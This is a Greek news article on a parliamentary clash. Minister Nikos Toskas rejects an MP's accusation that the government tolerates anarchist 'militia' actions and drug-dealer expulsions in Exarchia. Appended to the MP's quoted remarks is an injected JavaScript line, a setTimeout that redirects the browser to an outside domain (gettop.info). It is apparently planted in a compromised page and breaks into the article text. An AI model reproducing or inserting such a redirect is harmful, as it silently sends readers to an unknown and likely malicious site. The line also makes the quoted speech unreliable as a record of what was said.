Τόσκας: Υπερβολές τα περί κυβερνητικής ανοχής σε αντιεξουσιαστές

0
2

 

Yποκρισία και υπερβολές χαρακτήρισε τα όσα καταλογίζονται στη σημερινή κυβέρνηση, ότι δείχνει ανοχή σε δράσεις αντιεξουσιαστών ο υπουργός Προστασίας του Πολίτη Νίκος Τόσκας που αντιθέτως επέρριψε ευθύνες στις προηγούμενες κυβερνήσεις για την προβληματική, όπως τη χαρακτήρισε, κατάσταση που έχει δημιουργηθεί στα Εξάρχεια.

«Κλείνετε τα μάτια σε όσα γίνονται τώρα και ξεχνάτε όσα δεν έγιναν» είπε ο κ. Τόσκας, απαντώντας στον βουλευτή της Δημοκρατικής Συμπαράταξης Θόδωρο Παπαθεοδώρου, που έκανε λόγο για «ανοχή της κυβέρνησης ΣΥΡΙΖΑ – ΑΝΕΛ σε δράσεις «πολιτοφυλακής», από ομάδες αντιεξουσιαστών στα Εξάρχεια».

Ο κ. Παπαθεοδώρου κατηγόρησε το υπουργείο ότι δεν προχώρησε σε καμία σύλληψη όταν ομάδα αντιεξουσιαστών απομάκρυναν από τα Εξάρχεια, άτομα τα οποία, όπως υποστήριξαν, ήταν έμποροι ναρκωτικών σύμφωνα με βίντεο που ήρθε στο φως της δημοσιότητας. «Είναι προφανές ότι προσπαθούμε να συμμαζέψουμε καταστάσεις που θα έπρεπε να έχουν λυθεί εδώ και αρκετά χρόνια. Τα όσα υπερβολικά και υποκριτικά αναφέρονται σε χώρους πράγματι προβληματικούς, όπως είπε ο κύριος Παπαθεοδώρου, δεν βλέπουν τις ενέργειες που γίνονται τώρα και ξεχνούν τις ενέργειες που δεν είχαν γίνει ποτέ», αντέτεινε ο κ. Τόσκας.

«Δεν μπορώ να δεχτώ ότι η πολιτεία και το υπουργείο σας δεν αντιδρά σε τέτοια φαινόμενα. Το βίντεο είχε ως περιεχόμενο τη δράση πολιτοφυλακής αναρχικών στα Εξάρχεια. Αυτό είναι κατάλυση της Ελληνικής Δημοκρατίας σε έναν χώρο. Η απουσία της ΕΛ.ΑΣ είναι φανερή, αλλιώς θα έπρεπε να τους είχε συλλάβει. Γιατί το ανέχεστε; Γιατί δεν λέτε ότι η Δημοκρατία είναι απέναντι και δεν έχετε κανέναν διάλογο με αυτούς», σημείωσε ο βουλευτής της Δημοκρατικής Συμπαράταξης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here